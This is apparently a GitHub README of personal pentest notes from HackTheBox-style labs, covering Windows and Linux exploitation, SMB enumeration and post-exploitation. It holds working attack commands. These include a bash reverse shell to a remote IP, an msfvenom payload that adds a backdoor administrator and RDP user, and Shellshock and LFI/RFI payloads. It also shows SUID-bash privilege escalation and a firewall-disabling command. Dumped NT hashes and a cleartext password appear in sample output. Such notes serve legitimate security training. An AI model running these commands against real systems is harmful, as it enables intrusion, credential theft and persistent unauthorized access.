Skip to content

ivanitlearning/Pentest-Notes

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

36 Commits
Notes
Notes
 
 
README.md
README.md
 
 

Repository files navigation

Pentest-Notes

Some notes for myself

Buffer overflow

In ollydbg:

  1. Ctrl-G to go to memory expression
  2. Add a breakpoint at JMP ESP
  3. Ctrl-F2 for restarting program.
  4. F9 to run all the way.

Windows exploitation

When using Microsoft FTP, use dir -a to see hidden files/folders.

Testing for Windows RCE with ping <Kali-IP> and listen with tcpdump -i tap0 icmp

Try a reverse shell RCE with this CMD:

start \\10.10.14.36\netmon\shell_443.exe

Powershell:

powershell.exe cmd /c “ping <kali-ip>”

if you don't know what kind of RCE is allowed.

If you have creds, and TCP 5985 is open, try Win-RM

root@Kali:~/HTB/Pathfinder# cat winrm_shell.rb 
#!/usr/bin/ruby

require 'winrm'

conn = WinRM::Connection.new( 
  endpoint: 'http://10.10.10.30:5985/wsman',
  user: 'MEGACORP\sandra',
  password: 'Password1234!',
)

command=""

conn.shell(:powershell) do |shell|
    until command == "exit\n" do
        print "PS > "
        command = gets        
        output = shell.run(command) do |stdout, stderr|
            STDOUT.print stdout
            STDERR.print stderr
        end
    end    
    puts "Exiting with code #{output.exitcode}"
end
root@Kali:~/HTB/Pathfinder# ./winrm_shell.rb 
PS > ls
PS > whoami
megacorp\sandra

Syntax for Impacket's smbexec,psexec and wmiexec (note the slash is forward not backslash). Drop domain if it doesn't work.

wmiexec.py "local_admin":"P@ssw0rd123"@10.100.11.100
wmiexec.py "ELS-CHILD/local_admin":"P@ssw0rd123"@10.100.10.253

For windows buffer overflow payload, if can't get reverse shell, try this payload. No need to escape anything. it adds admin to RDP users. Can't get payload/cmd/windows/generic to work.

root@Kali:~/Infosec/vulnserver# msfvenom -a x86 --platform Windows -p windows/exec CMD='cmd /c net user /add admin Password1 & net localgroup Administrators admin /add & net localgroup "Remote Desktop Users" admin /add' -b '\x00' -f py -v shellcode

SMB enum

enum4linux hasn't worked too well.

May have to edit /etc/samba/smb.conf to add

   client min protocol = CORE
   client max protocol = SMB3

Try this with smbclient:

smbclient -L 10.130.40.70

smbclient -U''%'' -L 10.130.40.70

smbclient --no-pass -L //172.30.111.10

Use smbmap to map the folders and permissions first, then see what you have access to access with smbclient.

smbmap -u test -p 12345 -H 10.130.40.70
smbclient -U 'test%12345' //10.130.40.70/Documents

or mount it first then browse

Web

Check we can do LFI (include null byte terminator if necessary)

http://members.foocompany.com/index.php?pag=//..//..//..//..//..//..//..//Windows//system32//drivers//etc//hosts%00

See more here https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/

Check for RFI http://members.foocompany.com/index.php?pag=http://172.16.5.20:8000/

Host dir with python3 -m http.server

Windows post-exp

winPEAS requires .NET4, check what .NET is installed first.

Drop nmap.exe on windows target to enum, scan ports. Specify -sT option.

Get RDP if possible easier to enum with that with xfreerdp /v:10.10.10.95:3389 /u:admin /p:Password1 /size:90%

Use robocopy for transferring files from SMBserver

arp-scan.exe for discovering hosts on same subnet

Fping.exe for scanning outside networks. Here Fping from .1 to .254

C:\Temp>Fping.exe -g 172.30.111.1/172.30.111.254
Fping.exe -g 172.30.111.1/172.30.111.254

Fast pinger version 3.00
(c) Wouter Dhondt (http://www.kwakkelflap.com)

Disable FW if possible with C:\Temp>netsh advfirewall set allprofiles state off. Check status of FW with C:\Temp>netsh advfirewall show allprofiles state

If you can't net use a shared folder, enable File and Printer via RDP, reboot if necessary.

If you encounter error A specified logon session does not exist., do this

robocopy syntax

C:\Temp\SSFWin32>robocopy \\172.16.10.5\lab9 C:\Temp\SSFWin32 /e

If need to pivot from Windows, and have problems with existing accounts, create account and net use with creds

net use \\10.100.11.101\pivot /user:admin Password1

Use rmdir to delete recursively on Windows

C:\Tmp>rmdir SSFWin32\SSF-Win32 /s /q
rmdir SSFWin32\SSF-Win32 /s /q

If you somehow have access to SAM, SYSTEM and SECURITY in C:\Windows\System32\config, use Impacket's secretsdump.py

root@Kali:~/HTB/Bastion# secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL
Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:e4487d0421e6611a364a5028467e053c:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword 
(Unknown User):bureaulampje
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6
dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd
[*] Cleaning up...

Check for PS history file at C:\Users\sansforensics408\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine>

If you need to compile a kernel exploit, note that some C code has Microsoft implementation that won't work with normal mingw cross-compilation ie. root@Kali:~/HTB/Optimum# x86_64-w64-mingw32-gcc 41015.c -o 41015.exe

Instead, compile it with Developer Command Prompt for Visual Studio (type into Start)

D:\HTB\Optimum>cl 41015.c /link /out:41015_new2.exe
Microsoft (R) C/C++ Optimizing Compiler Version 19.10.25027 for x86
Copyright (C) Microsoft Corporation.  All rights reserved.

41015.c
Microsoft (R) Incremental Linker Version 14.10.25027.0
Copyright (C) Microsoft Corporation.  All rights reserved.

/out:41015.exe
/out:41015_new2.exe
41015.obj

D:\HTB\Optimum>dir 41015_new2.exe
 Volume in drive D is OS
 Volume Serial Number is 0EE7-D347

 Directory of D:\HTB\Optimum

19/04/2020  21:16           123,904 41015_new2.exe
               1 File(s)        123,904 bytes
               0 Dir(s)  589,864,071,168 bytes free

When searching for non-Microsoft installations, look at C:\Program Files (x86) and C:\, you might have to dig for creds in those utilities.

Linux exploitation

DNS enum when TCP/UDP 53 is running nslookup <domain> <DNS-server>

eg.

root@Kali:~/HTB/Cronos# nslookup 10.10.10.13 10.10.10.13
13.10.10.10.in-addr.arpa	name = ns1.cronos.htb.

Then when you get domain, try a DNS zone transfer

dig @<dns server> -t axfr <domain>

root@Kali:~/HTB/Cronos# dig @10.10.10.13 -t axfr cronos.htb

; <<>> DiG 9.11.5-P4-5-Debian <<>> @10.10.10.13 -t axfr cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.		604800	IN	NS	ns1.cronos.htb.
cronos.htb.		604800	IN	A	10.10.10.13
admin.cronos.htb.	604800	IN	A	10.10.10.13
ns1.cronos.htb.		604800	IN	A	10.10.10.13
www.cronos.htb.		604800	IN	A	10.10.10.13
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 307 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Thu Apr 23 23:05:36 +08 2020

Then add these to /etc/hosts and try to access via browser. It can make a difference.

If you can do RCE try nohup bash 'bash -i >& /dev/tcp/172.16.5.20/53 0>&1' &

PHP cmd exec

system("chown root:root /tmp/tmp/bash");
system("chmod u+s /tmp/tmp/bash");

In Burp repeater, for both Linux, Windows, Ctrl-U to url-encode, Ctrl-Shift-U to url-decode.

Shellshock

  1. Search for dir /cgi-bin/
  2. If found, search for files with ext .cgi .sh .pl .php
  3. Test with nmap shell shock script (either with or without cmd=)
nmap -sV -Pn -n --script=http-shellshock.nse --script-args uri=/cgi-bin/user.sh,cmd=id 10.10.10.56 -p80
  1. use curl to check if can view /etc/passwd, note the single quote.
curl -A '() { foo;};echo Content-type: text/plain; echo; echo; /bin/cat /etc/passwd' http://10.10.10.56/cgi-bin/user.sh
  1. Replace with payload to get reverse shell. Note that old Bash doesn't support Bash reverse shell, try nc or Python.

Linux post-exp

To see cron jobs pertaining to your user crontab -l

Copying files from Linux and want to see progress? Use rysnc

root@Kali:~/PTP/Labs/Lab20# rsync -ah --progress /root/Tools/SSF-Win32 /mnt/pivot/SSFWin32
sending incremental file list
created directory /mnt/pivot/SSFWin32

Syntax to get another reverse shell

nohup ./shell_80.elf &

Check if there are any Web servers we missed in /etc/apache2/sites-available/

If you have root cmd exec but don't want another reverse shell do this

cp /bin/bash /tmp/bash
chown root:root /tmp/bash
chmod u+s /tmp/bash

Then run with /tmp/bash -p to get root euid.

SUID's that don't lead anywhere. Tr0ll Vulnix

How to allow access only by URL and not IP.

wget usage for downloading all files hosted by Python webserver

wget -r http://kali.ip:8000/

About

Some notes for myself

Resources

Readme
Activity

Stars

7 stars

Watchers

1 watching

Forks

3 forks
Report repository

Releases

No releases published

Packages

No packages published